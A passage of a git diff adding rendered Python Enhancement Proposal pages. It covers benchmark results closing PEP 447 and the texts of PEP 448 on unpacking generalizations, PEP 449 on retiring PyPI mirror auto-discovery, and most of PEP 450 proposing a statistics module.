+                   SmallTuples:    46ms    47ms   -2.4%    46ms    48ms   -3.0%
+         SpecialClassAttribute:   126ms   120ms   +4.7%   126ms   121ms   +4.4%
+      SpecialInstanceAttribute:    42ms    42ms   +0.6%    42ms    42ms   +0.8%
+                StringMappings:    94ms    91ms   +3.9%    94ms    91ms   +3.8%
+              StringPredicates:    48ms    49ms   -1.7%    48ms    49ms   -2.1%
+                 StringSlicing:    45ms    45ms   +1.4%    46ms    45ms   +1.5%
+                     TryExcept:    23ms    22ms   +4.9%    23ms    22ms   +4.8%
+                    TryFinally:    32ms    32ms   -0.1%    32ms    32ms   +0.1%
+                TryRaiseExcept:    17ms    17ms   +0.9%    17ms    17ms   +0.5%
+                  TupleSlicing:    49ms    48ms   +1.1%    49ms    49ms   +1.0%
+                   WithFinally:    48ms    47ms   +2.3%    48ms    47ms   +2.4%
+               WithRaiseExcept:    45ms    44ms   +0.8%    45ms    45ms   +0.5%
+-------------------------------------------------------------------------------
+Totals:                          2284ms  2287ms   -0.1%  2306ms  2308ms   -0.1%
+
+(this=pep447.pybench, other=default.pybench)
+
+
+

A run of the benchmark suite (with option “-b 2n3”) also seems to indicate that +the performance impact is minimal:

+
Report on Linux fangorn.local 2.6.32-358.114.1.openstack.el6.x86_64 #1 SMP Wed Jul 3 02:11:25 EDT 2013 x86_64 x86_64
+Total CPU cores: 8
+
+### call_method_slots ###
+Min: 0.304120 -> 0.282791: 1.08x faster
+Avg: 0.304394 -> 0.282906: 1.08x faster
+Significant (t=2329.92)
+Stddev: 0.00016 -> 0.00004: 4.1814x smaller
+
+### call_simple ###
+Min: 0.249268 -> 0.221175: 1.13x faster
+Avg: 0.249789 -> 0.221387: 1.13x faster
+Significant (t=2770.11)
+Stddev: 0.00012 -> 0.00013: 1.1101x larger
+
+### django_v2 ###
+Min: 0.632590 -> 0.601519: 1.05x faster
+Avg: 0.635085 -> 0.602653: 1.05x faster
+Significant (t=321.32)
+Stddev: 0.00087 -> 0.00051: 1.6933x smaller
+
+### fannkuch ###
+Min: 1.033181 -> 0.999779: 1.03x faster
+Avg: 1.036457 -> 1.001840: 1.03x faster
+Significant (t=260.31)
+Stddev: 0.00113 -> 0.00070: 1.6112x smaller
+
+### go ###
+Min: 0.526714 -> 0.544428: 1.03x slower
+Avg: 0.529649 -> 0.547626: 1.03x slower
+Significant (t=-93.32)
+Stddev: 0.00136 -> 0.00136: 1.0028x smaller
+
+### iterative_count ###
+Min: 0.109748 -> 0.116513: 1.06x slower
+Avg: 0.109816 -> 0.117202: 1.07x slower
+Significant (t=-357.08)
+Stddev: 0.00008 -> 0.00019: 2.3664x larger
+
+### json_dump_v2 ###
+Min: 2.554462 -> 2.609141: 1.02x slower
+Avg: 2.564472 -> 2.620013: 1.02x slower
+Significant (t=-76.93)
+Stddev: 0.00538 -> 0.00481: 1.1194x smaller
+
+### meteor_contest ###
+Min: 0.196336 -> 0.191925: 1.02x faster
+Avg: 0.196878 -> 0.192698: 1.02x faster
+Significant (t=61.86)
+Stddev: 0.00053 -> 0.00041: 1.2925x smaller
+
+### nbody ###
+Min: 0.228039 -> 0.235551: 1.03x slower
+Avg: 0.228857 -> 0.236052: 1.03x slower
+Significant (t=-54.15)
+Stddev: 0.00130 -> 0.00029: 4.4810x smaller
+
+### pathlib ###
+Min: 0.108501 -> 0.105339: 1.03x faster
+Avg: 0.109084 -> 0.105619: 1.03x faster
+Significant (t=311.08)
+Stddev: 0.00022 -> 0.00011: 1.9314x smaller
+
+### regex_effbot ###
+Min: 0.057905 -> 0.056447: 1.03x faster
+Avg: 0.058055 -> 0.056760: 1.02x faster
+Significant (t=79.22)
+Stddev: 0.00006 -> 0.00015: 2.7741x larger
+
+### silent_logging ###
+Min: 0.070810 -> 0.072436: 1.02x slower
+Avg: 0.070899 -> 0.072609: 1.02x slower
+Significant (t=-191.59)
+Stddev: 0.00004 -> 0.00008: 2.2640x larger
+
+### spectral_norm ###
+Min: 0.290255 -> 0.299286: 1.03x slower
+Avg: 0.290335 -> 0.299541: 1.03x slower
+Significant (t=-572.10)
+Stddev: 0.00005 -> 0.00015: 2.8547x larger
+
+### threaded_count ###
+Min: 0.107215 -> 0.115206: 1.07x slower
+Avg: 0.107488 -> 0.115996: 1.08x slower
+Significant (t=-109.39)
+Stddev: 0.00016 -> 0.00076: 4.8665x larger
+
+The following not significant results are hidden, use -v to show them:
+call_method, call_method_unknown, chaos, fastpickle, fastunpickle, float, formatted_logging, hexiom2, json_load, normal_startup, nqueens, pidigits, raytrace, regex_compile, regex_v8, richards, simple_logging, startup_nosite, telco, unpack_sequence.
+
+
+
+
+
+

Alternative proposals

+
+

__getattribute_super__

+

An earlier version of this PEP used the following static method on classes:

+
def __getattribute_super__(cls, name, object, owner): pass
+
+
+

This method performed name lookup as well as invoking descriptors and was +necessarily limited to working only with super.__getattribute__.

+
+
+

Reuse tp_getattro

+

It would be nice to avoid adding a new slot, thus keeping the API simpler and +easier to understand. A comment on Issue 18181 asked about reusing the +tp_getattro slot, that is super could call the tp_getattro slot of all +methods along the MRO.

+

That won’t work because tp_getattro will look in the instance +__dict__ before it tries to resolve attributes using classes in the MRO. +This would mean that using tp_getattro instead of peeking the class +dictionaries changes the semantics of the super class.

+
+
+

Alternative placement of the new method

+

This PEP proposes to add __getdescriptor__ as a method on the metaclass. +An alternative would be to add it as a class method on the class itself +(similar to how __new__ is a staticmethod of the class and not a method +of the metaclass).

+

The advantage of using a method on the metaclass is that will give an error +when two classes on the MRO have different metaclasses that may have different +behaviors for __getdescriptor__. With a normal classmethod that problem +would pass undetected while it might cause subtle errors when running the code.

+
+
+
+

History

+
    +
  • 23-Jul-2015: Added type flag Py_TPFLAGS_GETDESCRIPTOR after talking +with Guido.

    The new flag is primarily useful to avoid crashing when loading an extension +for an older version of CPython and could have positive speed implications +as well.

    +
  • +
  • Jul-2014: renamed slot to __getdescriptor__, the old name didn’t +match the naming style of other slots and was less descriptive.
  • +
+
+
+

Discussion threads

+ +
+
+

References

+
    +
  • Issue 18181 contains an out of date prototype implementation
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0447.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0448/index.html b/pep-0448/index.html new file mode 100644 index 00000000000..7584e024346 --- /dev/null +++ b/pep-0448/index.html @@ -0,0 +1,342 @@ + + + + + + + + PEP 448 – Additional Unpacking Generalizations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 448 – Additional Unpacking Generalizations

+
+
Author:
+
Joshua Landau <joshua at landau.ws>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Jun-2013
+
Python-Version:
+
3.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes extended usages of the * iterable unpacking +operator and ** dictionary unpacking operators +to allow unpacking in more positions, an arbitrary number of +times, and in function calls and displays.

+

Function calls are proposed to support an arbitrary number of +unpackings rather than just one:

+
>>> print(*[1], *[2], 3)
+1 2 3
+>>> dict(**{'x': 1}, y=2, **{'z': 3})
+{'x': 1, 'y': 2, 'z': 3}
+
+
+

Unpacking is proposed to be allowed inside tuple, list, set, +and dictionary displays:

+
>>> *range(4), 4
+(0, 1, 2, 3, 4)
+>>> [*range(4), 4]
+[0, 1, 2, 3, 4]
+>>> {*range(4), 4}
+{0, 1, 2, 3, 4}
+>>> {'x': 1, **{'y': 2}}
+{'x': 1, 'y': 2}
+
+
+

In dictionaries, later values will always override earlier ones:

+
>>> {'x': 1, **{'x': 2}}
+{'x': 2}
+
+>>> {**{'x': 2}, 'x': 1}
+{'x': 1}
+
+
+

This PEP does not include unpacking operators inside list, set and +dictionary comprehensions although this has not been ruled out for +future proposals.

+
+
+

Rationale

+

Current usage of the * iterable unpacking operator features +unnecessary restrictions that can harm readability.

+

Unpacking multiple times has an obvious rationale. When you want to +unpack several iterables into a function definition or follow an unpack +with more positional arguments, the most natural way would be to write:

+
function(**kw_arguments, **more_arguments)
+
+function(*arguments, argument)
+
+
+

Simple examples where this is useful are print and str.format. +Instead, you could be forced to write:

+
kwargs = dict(kw_arguments)
+kwargs.update(more_arguments)
+function(**kwargs)
+
+args = list(arguments)
+args.append(arg)
+function(*args)
+
+
+

or, if you know to do so:

+
from collections import ChainMap
+function(**ChainMap(more_arguments, arguments))
+
+from itertools import chain
+function(*chain(args, [arg]))
+
+
+

which add unnecessary line-noise and, with the first methods, causes +duplication of work.

+

There are two primary rationales for unpacking inside of containers. +Firstly there is a symmetry of assignment, where fst, *other, lst = +elems and elems = fst, *other, lst are approximate inverses, +ignoring the specifics of types. This, in effect, simplifies the +language by removing special cases.

+

Secondly, it vastly simplifies types of “addition” such as combining +dictionaries, and does so in an unambiguous and well-defined way:

+
combination = {**first_dictionary, "x": 1, "y": 2}
+
+
+

instead of:

+
combination = first_dictionary.copy()
+combination.update({"x": 1, "y": 2})
+
+
+

which is especially important in contexts where expressions are +preferred. This is also useful as a more readable way of summing +iterables into a list, such as my_list + list(my_tuple) + +list(my_range) which is now equivalent to just [*my_list, +*my_tuple, *my_range].

+
+
+

Specification

+

Function calls may accept an unbounded number of * and ** +unpackings. There will be no restriction of the order of positional +arguments with relation to * unpackings nor any restriction of the +order of keyword arguments with relation to ** unpackings.

+

Function calls continue to have the restriction that keyword arguments +must follow positional arguments and ** unpackings must additionally +follow * unpackings.

+

Currently, if an argument is given multiple times — such as a +positional argument given both positionally and by keyword — a +TypeError is raised. This remains true for duplicate arguments +provided through multiple ** unpackings, +e.g. f(**{'x': 2}, **{'x': 3}), except that the error will be +detected at runtime.

+

A function looks like this:

+
function(
+    argument or *args, argument or *args, ...,
+    kwargument or *args, kwargument or *args, ...,
+    kwargument or **kwargs, kwargument or **kwargs, ...
+)
+
+
+

Tuples, lists, sets and dictionaries will allow unpacking. This will +act as if the elements from unpacked items were inserted in order at +the site of unpacking, much as happens in unpacking in a function-call. +Dictionaries require ** unpacking; all the others require * unpacking.

+

The keys in a dictionary remain in a right-to-left priority order, so +{**{'a': 1}, 'a': 2, **{'a': 3}} evaluates to {'a': 3}. There +is no restriction on the number or position of unpackings.

+
+
+

Disadvantages

+

The allowable orders for arguments in a function call are more +complicated than before. The simplest explanation for the rules +may be “positional arguments precede keyword arguments and ** +unpacking; * unpacking precedes ** unpacking”.

+

Whilst *elements, = iterable causes elements to be a list, +elements = *iterable, causes elements to be a tuple. The +reason for this may confuse people unfamiliar with the construct.

+

Concerns have been raised about the unexpected difference between +duplicate keys in dictionaries being allowed but duplicate keys +in function call syntax raising an error. Although this is already +the case with current syntax, this proposal might exacerbate the +issue. It remains to be seen how much of an issue this is in practice.

+
+
+

Variations

+

The PEP originally considered whether the ordering of argument types +in a function call (positional, keyword, * or **) could become +less strict. This met little support so the idea was shelved.

+

Earlier iterations of this PEP allowed unpacking operators inside +list, set, and dictionary comprehensions as a flattening operator +over iterables of containers:

+
>>> ranges = [range(i) for i in range(5)]
+>>> [*item for item in ranges]
+[0, 0, 1, 0, 1, 2, 0, 1, 2, 3]
+
+>>> {*item for item in ranges}
+{0, 1, 2, 3}
+
+
+

This was met with a mix of strong concerns about readability and mild +support. In order not to disadvantage the less controversial aspects +of the PEP, this was not accepted with the rest of the proposal.

+

Unbracketed comprehensions in function calls, such as f(x for x in it), +are already valid. These could be extended to:

+
f(*x for x in it) == f((*x for x in it))
+f(**x for x in it) == f({**x for x in it})
+
+
+

However, it wasn’t clear if this was the best behaviour or if it should +unpack into the arguments of the call to f. Since this is likely to be +confusing and is of only very marginal utility, it is not included in this +PEP. Instead, these will throw a SyntaxError and comprehensions with +explicit brackets should be used instead.

+
+
+

Approval

+

This PEP was accepted by Guido on February 25, 2015 [1].

+
+
+

Implementation

+

An implementation for Python 3.5 is found at Issue 2292 on bug tracker [2]. +This currently includes support for unpacking inside comprehensions, which +should be removed.

+
+
+

References

+ +

[3] Discussion on Python-ideas list, + “list / array comprehensions extension”, Alexander Heger + (https://mail.python.org/pipermail/python-ideas/2011-December/013097.html)

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0448.rst

+

Last modified: 2023-12-11 18:58:32 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0449/index.html b/pep-0449/index.html new file mode 100644 index 00000000000..ef01555607d --- /dev/null +++ b/pep-0449/index.html @@ -0,0 +1,260 @@ + + + + + + + + PEP 449 – Removal of the PyPI Mirror Auto Discovery and Naming Scheme | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 449 – Removal of the PyPI Mirror Auto Discovery and Naming Scheme

+
+
Author:
+
Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Richard Jones <richard at python.org>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Process
+
Topic:
+
Packaging
+
Created:
+
04-Aug-2013
+
Post-History:
+
04-Aug-2013
+
Replaces:
+
381
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP provides a path to deprecate and ultimately remove the auto discovery +of PyPI mirrors as well as the hard coded naming scheme which requires +delegating a domain name under pypi.python.org to a third party.

+
+
+

Rationale

+

The PyPI mirroring infrastructure (defined in PEP 381) provides a means to +mirror the content of PyPI used by the automatic installers. It also provides +a method for auto discovery of mirrors and a consistent naming scheme.

+

There are a number of problems with the auto discovery protocol and the +naming scheme:

+
    +
  • They give control over a *.python.org domain name to a third party, +allowing that third party to set or read cookies on the pypi.python.org and +python.org domain name.
  • +
  • The use of a sub domain of pypi.python.org means that the mirror operators +will never be able to get a SSL certificate of their own, and giving them +one for a python.org domain name is unlikely to happen.
  • +
  • The auto discovery uses an unauthenticated protocol (DNS).
  • +
  • The lack of a TLS certificate on these domains means that clients can not +be sure that they have not been a victim of DNS poisoning or a MITM attack.
  • +
  • The auto discovery protocol was designed to enable a client to automatically +select a mirror for use. This is no longer a requirement because the CDN +that PyPI is now using a globally distributed network of servers which will +automatically select one close to the client without any effort on the +clients part.
  • +
  • The auto discovery protocol and use of the consistent naming scheme has only +ever been implemented by one installer (pip), and its implementation, besides +being insecure, has serious issues with performance and is slated for removal +with its next release (1.5).
  • +
  • While there are provisions in PEP 381 that would solve some of these +issues for a dedicated client it would not solve the issues that affect a +users browser. Additionally these provisions have not been implemented by +any installer to date.
  • +
+

Due to the number of issues, some of them very serious, and the CDN which +provides most of the benefit of the auto discovery and consistent naming scheme +this PEP proposes to first deprecate and then remove the [a..z].pypi.python.org +names for mirrors and the last.pypi.python.org name for the auto discovery +protocol. The ability to mirror and the method of mirror will not be affected +and will continue to exist as written in PEP 381. Operators of existing +mirrors are encouraged to acquire their own domains and certificates to use for +their mirrors if they wish to continue hosting them.

+
+
+

Plan for Deprecation & Removal

+

Immediately upon acceptance of this PEP documentation on PyPI will be updated +to reflect the deprecated nature of the official public mirrors and will +direct users to external resources like http://www.pypi-mirrors.org/ to +discover unofficial public mirrors if they wish to use one.

+

Mirror operators, if they wish to continue operating their mirror, should +acquire a domain name to represent their mirror and, if they are able, a TLS +certificate. Once they have acquired a domain they should redirect their +assigned N.pypi.python.org domain name to their new domain. On Feb 15th, 2014 +the DNS entries for [a..z].pypi.python.org and last.pypi.python.org will be +removed. At any time prior to Feb 15th, 2014 a mirror operator may request +that their domain name be reclaimed by PyPI and pointed back at the master.

+
+

Why Feb 15th, 2014

+

The most critical decision of this PEP is the final cut off date. If the date +is too soon then it needlessly punishes people by forcing them to drop +everything to update their deployment scripts. If the date is too far away then +the extended period of time does not help with the migration effort and merely +puts off the migration until a later date.

+

The date of Feb 15th, 2014 has been chosen because it is roughly 6 months from +the date of the PEP. This should ensure a lengthy period of time to enable +people to update their deployment procedures to point to the new domains names +without merely padding the cut off date.

+
+
+

Why the DNS entries must be removed

+

While it would be possible to simply reclaim the domain names used in mirror +and direct them back at PyPI in order to prevent users from needing to update +configurations to point away from those domains this has a number of issues.

+
    +
  • Anyone who currently has these names hard coded in their configuration has +them hard coded as HTTP. This means that by allowing these names to continue +resolving we make it simple for a MITM operator to attack users by rewriting +the redirect to HTTPS prior to giving it to the client.
  • +
  • The overhead of maintaining several domains pointing at PyPI has proved +troublesome for the small number of N.pypi.python.org domains that have +already been reclaimed. They oftentimes get mis-configured when things +change on the service which often leaves them broken for months at a time +until somebody notices. By leaving them in we leave users of these domains +open to random breakages which are less likely to get caught or noticed.
  • +
  • People using these domains have explicitly chosen to use them for one reason +or another. One such reason may be because they do not wish to deploy from +a host located in a particular country. If these domains continue to resolve +but do not point at their existing locations we have silently removed this +choice from the existing users of those domains.
  • +
+

That being said, removing the entries will require users who have modified +their configuration to either point back at the master (PyPI) or select a new +mirror name to point at. This is regarded as a regrettable requirement to +protect PyPI itself and the users of the mirrors from the attacks outlined +above or, at the very least, require them to make an informed decision about +the insecurity.

+
+
+
+

Public or Private Mirrors

+

The mirroring protocol will continue to exist as defined in PEP 381 and +people are encouraged to host public and private mirrors if they so desire. +The recommended mirroring client is Bandersnatch.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0449.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0450/index.html b/pep-0450/index.html new file mode 100644 index 00000000000..2e517242b0e --- /dev/null +++ b/pep-0450/index.html @@ -0,0 +1,721 @@ + + + + + + + + PEP 450 – Adding A Statistics Module To The Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 450 – Adding A Statistics Module To The Standard Library

+
+
Author:
+
Steven D’Aprano <steve at pearwood.info>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Aug-2013
+
Python-Version:
+
3.4
+
Post-History:
+
13-Sep-2013
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes the addition of a module for common statistics functions such +as mean, median, variance and standard deviation to the Python standard +library. See also http://bugs.python.org/issue18606

+
+
+

Rationale

+

The proposed statistics module is motivated by the “batteries included” +philosophy towards the Python standard library. Raymond Hettinger and other +senior developers have requested a quality statistics library that falls +somewhere in between high-end statistics libraries and ad hoc code. [1] +Statistical functions such as mean, standard deviation and others are obvious +and useful batteries, familiar to any Secondary School student. Even cheap +scientific calculators typically include multiple statistical functions such +as:

+
    +
  • mean
  • +
  • population and sample variance
  • +
  • population and sample standard deviation
  • +
  • linear regression
  • +
  • correlation coefficient
  • +
+

Graphing calculators aimed at Secondary School students typically include all +of the above, plus some or all of:

+
    +
  • median
  • +
  • mode
  • +
  • functions for calculating the probability of random variables from the +normal, t, chi-squared, and F distributions
  • +
  • inference on the mean
  • +
+

and others [2]. Likewise spreadsheet applications such as Microsoft Excel, +LibreOffice and Gnumeric include rich collections of statistical +functions [3].

+

In contrast, Python currently has no standard way to calculate even the +simplest and most obvious statistical functions such as mean. For those who +need statistical functions in Python, there are two obvious solutions:

+
    +
  • install numpy and/or scipy [4];
  • +
  • or use a Do It Yourself solution.
  • +
+

Numpy is perhaps the most full-featured solution, but it has a few +disadvantages:

+
    +
  • It may be overkill for many purposes. The documentation for numpy even warns
    +
    “It can be hard to know what functions are available in numpy. This is +not a complete list, but it does cover most of them.”[5]
    +

    and then goes on to list over 270 functions, only a small number of which are +related to statistics.

    +
  • +
  • Numpy is aimed at those doing heavy numerical work, and may be intimidating +to those who don’t have a background in computational mathematics and +computer science. For example, numpy.mean takes four arguments:
    mean(a, axis=None, dtype=None, out=None)
    +
    +
    +

    although fortunately for the beginner or casual numpy user, three are +optional and numpy.mean does the right thing in simple cases:

    +
    >>>  numpy.mean([1, 2, 3, 4])
    +2.5
    +
    +
    +
  • +
  • For many people, installing numpy may be difficult or impossible. For +example, people in corporate environments may have to go through a difficult, +time-consuming process before being permitted to install third-party +software. For the casual Python user, having to learn about installing +third-party packages in order to average a list of numbers is unfortunate.
  • +
+

This leads to option number 2, DIY statistics functions. At first glance, this +appears to be an attractive option, due to the apparent simplicity of common +statistical functions. For example:

+
def mean(data):
+    return sum(data)/len(data)
+
+def variance(data):
+    # Use the Computational Formula for Variance.
+    n = len(data)
+    ss = sum(x**2 for x in data) - (sum(data)**2)/n
+    return ss/(n-1)
+
+def standard_deviation(data):
+    return math.sqrt(variance(data))
+
+
+

The above appears to be correct with a casual test:

+
>>> data = [1, 2, 4, 5, 8]
+>>> variance(data)
+7.5
+
+
+

But adding a constant to every data point should not change the variance:

+
>>> data = [x+1e12 for x in data]
+>>> variance(data)
+0.0
+
+
+

And variance should never be negative:

+
>>> variance(data*100)
+-1239429440.1282566
+
+
+

By contrast, the proposed reference implementation gets the exactly correct +answer 7.5 for the first two examples, and a reasonably close answer for the +third: 6.012. numpy does no better [6].

+

Even simple statistical calculations contain traps for the unwary, starting +with the Computational Formula itself. Despite the name, it is numerically +unstable and can be extremely inaccurate, as can be seen above. It is +completely unsuitable for computation by computer [7]. This problem plagues +users of many programming language, not just Python [8], as coders reinvent +the same numerically inaccurate code over and over again [9], or advise others +to do so [10].

+

It isn’t just the variance and standard deviation. Even the mean is not quite +as straightforward as it might appear. The above implementation seems too +simple to have problems, but it does:

+
    +
  • The built-in sum can lose accuracy when dealing with floats of wildly +differing magnitude. Consequently, the above naive mean fails this +“torture test”:
    assert mean([1e30, 1, 3, -1e30]) == 1
    +
    +
    +

    returning 0 instead of 1, a purely computational error of 100%.

    +
  • +
  • Using math.fsum inside mean will make it more accurate with float +data, but it also has the side-effect of converting any arguments to float +even when unnecessary. E.g. we should expect the mean of a list of Fractions +to be a Fraction, not a float.
  • +
+

While the above mean implementation does not fail quite as catastrophically as +the naive variance does, a standard library function can do much better than +the DIY versions.

+

The example above involves an especially bad set of data, but even for more +realistic data sets accuracy is important. The first step in interpreting +variation in data (including dealing with ill-conditioned data) is often to +standardize it to a series with variance 1 (and often mean 0). This +standardization requires accurate computation of the mean and variance of the +raw series. Naive computation of mean and variance can lose precision very +quickly. Because precision bounds accuracy, it is important to use the most +precise algorithms for computing mean and variance that are practical, or the +results of standardization are themselves useless.

+
+
+

Comparison To Other Languages/Packages

+

The proposed statistics library is not intended to be a competitor to such +third-party libraries as numpy/scipy, or of proprietary full-featured +statistics packages aimed at professional statisticians such as Minitab, SAS +and Matlab. It is aimed at the level of graphing and scientific calculators.

+

Most programming languages have little or no built-in support for statistics +functions. Some exceptions:

+
+

R

+

R (and its proprietary cousin, S) is a programming language designed for +statistics work. It is extremely popular with statisticians and is extremely +feature-rich [11].

+
+
+

C#

+

The C# LINQ package includes extension methods to calculate the average of +enumerables [12].

+
+
+

Ruby

+

Ruby does not ship with a standard statistics module, despite some apparent +demand [13]. Statsample appears to be a feature-rich third-party library, +aiming to compete with R [14].

+
+
+

PHP

+

PHP has an extremely feature-rich (although mostly undocumented) set of +advanced statistical functions [15].

+
+
+

Delphi

+

Delphi includes standard statistical functions including Mean, Sum, +Variance, TotalVariance, MomentSkewKurtosis in its Math library [16].

+
+
+

GNU Scientific Library

+

The GNU Scientific Library includes standard statistical functions, +percentiles, median and others [17]. One innovation I have borrowed from the +GSL is to allow the caller to optionally specify the pre-calculated mean of +the sample (or an a priori known population mean) when calculating the variance +and standard deviation [18].

+
+
+
+

Design Decisions Of The Module

+

My intention is to start small and grow the library as needed, rather than try +to include everything from the start. Consequently, the current reference +implementation includes only a small number of functions: mean, variance, +standard deviation, median, mode. (See the reference implementation for a full +list.)

+

I have aimed for the following design features:

+
    +
  • Correctness over speed. It is easier to speed up a correct but slow function +than to correct a fast but buggy one.
  • +
  • Concentrate on data in sequences, allowing two-passes over the data, rather +than potentially compromise on accuracy for the sake of a one-pass algorithm. +Functions expect data will be passed as a list or other sequence; if given an +iterator, they may internally convert to a list.
  • +
  • Functions should, as much as possible, honour any type of numeric data. E.g. +the mean of a list of Decimals should be a Decimal, not a float. When this is +not possible, treat float as the “lowest common data type”.
  • +
  • Although functions support data sets of floats, Decimals or Fractions, there +is no guarantee that mixed data sets will be supported. (But on the other +hand, they aren’t explicitly rejected either.)
  • +
  • Plenty of documentation, aimed at readers who understand the basic concepts +but may not know (for example) which variance they should use (population or +sample?). Mathematicians and statisticians have a terrible habit of being +inconsistent with both notation and terminology [19], and having spent many +hours making sense of the contradictory/confusing definitions in use, it is +only fair that I do my best to clarify rather than obfuscate the topic.
  • +
  • But avoid going into tedious [20] mathematical detail.
  • +
+
+
+

API

+

The initial version of the library will provide univariate (single variable) +statistics functions. The general API will be based on a functional model +function(data, ...) -> result, where data is a mandatory iterable of +(usually) numeric data.

+

The author expects that lists will be the most common data type used, but any +iterable type should be acceptable. Where necessary, functions may convert to +lists internally. Where possible, functions are expected to conserve the type +of the data values, for example, the mean of a list of Decimals should be a +Decimal rather than float.

+
+

Calculating mean, median and mode

+

The mean, median* and mode functions take a single mandatory +argument and return the appropriate statistic, e.g.:

+
>>> mean([1, 2, 3])
+2.0
+
+
+

Functions provided are:

+
    +
  • +
    mean(data)
    arithmetic mean of data.
    +
    +
  • +
  • +
    median(data)
    median (middle value) of data, taking the average of the two +middle values when there are an even number of values.
    +
    +
  • +
  • +
    median_high(data)
    high median of data, taking the larger of the two middle +values when the number of items is even.
    +
    +
  • +
  • +
    median_low(data)
    low median of data, taking the smaller of the two middle +values when the number of items is even.
    +
    +
  • +
  • +
    median_grouped(data, interval=1)
    50th percentile of grouped data, using interpolation.
    +
    +
  • +
  • +
    mode(data)
    most common data point.
    +
    +
  • +
+

mode is the sole exception to the rule that the data argument must be +numeric. It will also accept an iterable of nominal data, such as strings.

+
+
+

Calculating variance and standard deviation

+

In order to be similar to scientific calculators, the statistics module will +include separate functions for population and sample variance and standard +deviation. All four functions have similar signatures, with a single mandatory +argument, an iterable of numeric data, e.g.:

+
>>> variance([1, 2, 2, 2, 3])
+0.5
+
+
+

All four functions also accept a second, optional, argument, the mean of the +data. This is modelled on a similar API provided by the GNU Scientific +Library [18]. There are three use-cases for using this argument, in no +particular order:

+
    +
  1. The value of the mean is known a priori.
  2. +
  3. You have already calculated the mean, and wish to avoid calculating +it again.
  4. +
  5. You wish to (ab)use the variance functions to calculate the second +moment about some given point other than the mean.
  6. +
+

In each case, it is the caller’s responsibility to ensure that given +argument is meaningful.

+

Functions provided are:

+
    +
  • +
    variance(data, xbar=None)
    sample variance of data, optionally using xbar as the sample mean.
    +
    +
  • +
  • +
    stdev(data, xbar=None)
    sample standard deviation of data, optionally using xbar as the +sample mean.
    +
    +
  • +
  • +
    pvariance(data, mu=None)
    population variance of data, optionally using mu as the population +mean.
    +
    +
  • +
  • +
    pstdev(data, mu=None)
    population standard deviation of data, optionally using mu as the +population mean.
    +
    +
  • +
+
+
+

Other functions

+

There is one other public function:

+
    +
  • +
    sum(data, start=0)
    high-precision sum of numeric data.
    +
    +
  • +
+
+
+
+

Specification

+

As the proposed reference implementation is in pure Python, other Python +implementations can easily make use of the module unchanged, or adapt it as +they see fit.

+
+
+

What Should Be The Name Of The Module?

+

This will be a top-level module statistics.

+

There was some interest in turning math into a package, and making this a +sub-module of math, but the general consensus eventually agreed on a +top-level module. Other potential but rejected names included stats (too +much risk of confusion with existing stat module), and statslib +(described as “too C-like”).

+
+
+

Discussion And Resolved Issues

+

This proposal has been previously discussed here [21].

+

A number of design issues were resolved during the discussion on Python-Ideas +and the initial code review. There was a lot of concern about the addition of +yet another sum function to the standard library, see the FAQs below for +more details. In addition, the initial implementation of sum suffered from +some rounding issues and other design problems when dealing with Decimals. +Oscar Benjamin’s assistance in resolving this was invaluable.

+

Another issue was the handling of data in the form of iterators. The first +implementation of variance silently swapped between a one- and two-pass +algorithm, depending on whether the data was in the form of an iterator or +sequence. This proved to be a design mistake, as the calculated variance could +differ slightly depending on the algorithm used, and variance etc. were +changed to internally generate a list and always use the more accurate two-pass +implementation.

+

One controversial design involved the functions to calculate median, which were +implemented as attributes on the median callable, e.g. median, +median.low, median.high etc. Although there is at least one existing +use of this style in the standard library, in unittest.mock, the code +reviewers felt that this was too unusual for the standard library. +Consequently, the design has been changed to a more traditional design of +separate functions with a pseudo-namespace naming convention, median_low, +median_high, etc.

+

Another issue that was of concern to code reviewers was the existence of a +function calculating the sample mode of continuous data, with some people +questioning the choice of algorithm, and whether it was a sufficiently common +need to be included. So it was dropped from the API, and mode now +implements only the basic schoolbook algorithm based on counting unique values.

+

Another significant point of discussion was calculating statistics of +timedelta objects. Although the statistics module will not directly +support timedelta objects, it is possible to support this use-case by +converting them to numbers first using the timedelta.total_seconds method.

+
+
+

Frequently Asked Questions

+
+

Shouldn’t this module spend time on PyPI before being considered for the standard library?

+

Older versions of this module have been available on PyPI [22] since 2010. +Being much simpler than numpy, it does not require many years of external +development.

+
+
+

Does the standard library really need yet another version of sum?

+

This proved to be the most controversial part of the reference implementation. +In one sense, clearly three sums is two too many. But in another sense, yes. +The reasons why the two existing versions are unsuitable are described +here [23] but the short summary is:

+
    +
  • the built-in sum can lose precision with floats;
  • +
  • the built-in sum accepts any non-numeric data type that supports the + +operator, apart from strings and bytes;
  • +
  • math.fsum is high-precision, but coerces all arguments to float.
  • +
+

There was some interest in “fixing” one or the other of the existing sums. If +this occurs before 3.4 feature-freeze, the decision to keep statistics.sum +can be re-considered.

+
+
+

Will this module be backported to older versions of Python?

+

